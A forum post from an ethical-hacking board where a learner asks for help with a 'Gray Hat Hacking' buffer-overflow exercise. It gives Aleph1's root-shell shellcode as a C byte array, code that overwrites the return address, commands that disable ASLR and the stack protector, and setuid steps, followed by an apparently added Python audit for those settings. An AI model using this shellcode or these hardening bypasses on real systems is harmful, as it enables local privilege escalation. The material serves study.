Go4Expert > Ethical hacking > shellcode question (http://www.go4expert.com/forums/shellcode-question-t21074/)

jacksmash 22Feb2010 20:59

shellcode question
 
Hi,

I recently bought a book called "Gray Hat Hacking." I've been able to get through the first 150 pages or so with no problem, but there is an exercise I'm having a bit of a tough time with. It seems that it should be pretty simple, so I thought I'd post what I'm doing and see if anyone has any insight.

First of all, the goal is to use a buffer overflow to obtain a root shell prompt.

The code is quite simple. I'll post it here:
Code:

/* Aleph1's execve("/bin/sh") shellcode (setuid(0) first), written as adjacent
   string literals so the array is one contiguous byte string. */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main ()
{
  int *ret;
  /* assume the saved return address sits two words above ret's slot */
  ret = (int *)&ret + 2;

  (*ret) = (int)shellcode;
  return 0;
}

The point is to increment the return pointer to point to the saved return value on the stack. But there are a couple of tricks:

1. You have to run gcc with -fno-stack-protector, since newer versions of gcc protect against stack smashing.

2. Recent Linux builds use ASLR to randomize stack memory calls, and so on my Ubuntu box it is important to first run the following command:

Code:

# echo "0" > /proc/sys/kernel/randomize_va_space

Now, when I compile the code above and then run it, I get a segmentation fault. I've noticed that if I increment the return pointer by something other than "2", I no longer get the fault, but I still do not get a root shell. In case you want to try it yourself, here are the steps:

Code:

# // do the following as root:
# gcc -fno-stack-protector shellcode.c
# chmod u+s a.out
# su <user_with_normal_privileges>
$ ./a.out
# // should have a root shell at this point

Please note that the C code is Aleph1's shellcode, so I'm not copying something from the book that isn't already online.

If you have any insights that would be helpful for me to consider, I would be most grateful!!

Cheers.

jacksmash
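The two "tricks" in the post are both hardening controls being switched off (ASLR via randomize_va_space, the stack protector via -fno-stack-protector), and the exercise leaves a setuid-root a.out on disk. As an added example, not code from the post or the book, here is a small Python audit for those residual settings on a lab box; the function names and the `__stack_chk_fail` heuristic are my assumptions, not anything from the thread.

```python
# Audit the controls the exercise disables: ASLR level and setuid-root
# binaries that show no sign of stack-protector instrumentation.
import os
import stat
import sys
from pathlib import Path

# Meaning of /proc/sys/kernel/randomize_va_space values.
ASLR_LEVELS = {
    "0": "disabled (the value the post sets)",
    "1": "conservative (stack, mmap base and VDSO randomised)",
    "2": "full (level 1 plus brk-based heap)",
}

def describe_aslr(raw):
    """Map the sysctl text to a readable level; unknown values are reported as such."""
    value = raw.strip()
    return ASLR_LEVELS.get(value, f"unknown value {value!r}")

def read_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the live sysctl (or a file standing in for it) and describe it."""
    return describe_aslr(Path(path).read_text())

def lacks_stack_protector(binary_path):
    """Heuristic (my assumption): a dynamically linked binary built with
    -fstack-protector references __stack_chk_fail; one built with
    -fno-stack-protector, as in the post, carries no such symbol.  Tiny
    programs with no protected frames also lack it, so a True result means
    'inspect further', not proof."""
    return b"__stack_chk_fail" not in Path(binary_path).read_bytes()

def find_setuid_root(directory):
    """Regular files directly under directory that are setuid and owned by uid 0."""
    hits = []
    for entry in Path(directory).iterdir():
        try:
            st = entry.stat()
        except OSError:
            continue  # unreadable entry, skip rather than abort the audit
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
            hits.append(str(entry))
    return sorted(hits)

def audit(directory, aslr_path="/proc/sys/kernel/randomize_va_space"):
    """Findings a reviewer would act on: ASLR level plus unprotected setuid-root files."""
    unprotected = [p for p in find_setuid_root(directory) if lacks_stack_protector(p)]
    return {"aslr": read_aslr(aslr_path), "unprotected_setuid_root": unprotected}

if __name__ == "__main__":
    print(audit(sys.argv[1] if len(sys.argv) > 1 else os.getcwd()))
```

Run it in the directory holding a.out after the exercise; an "aslr: disabled" line or a listed setuid-root binary is what should be reverted before the box is used for anything else.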
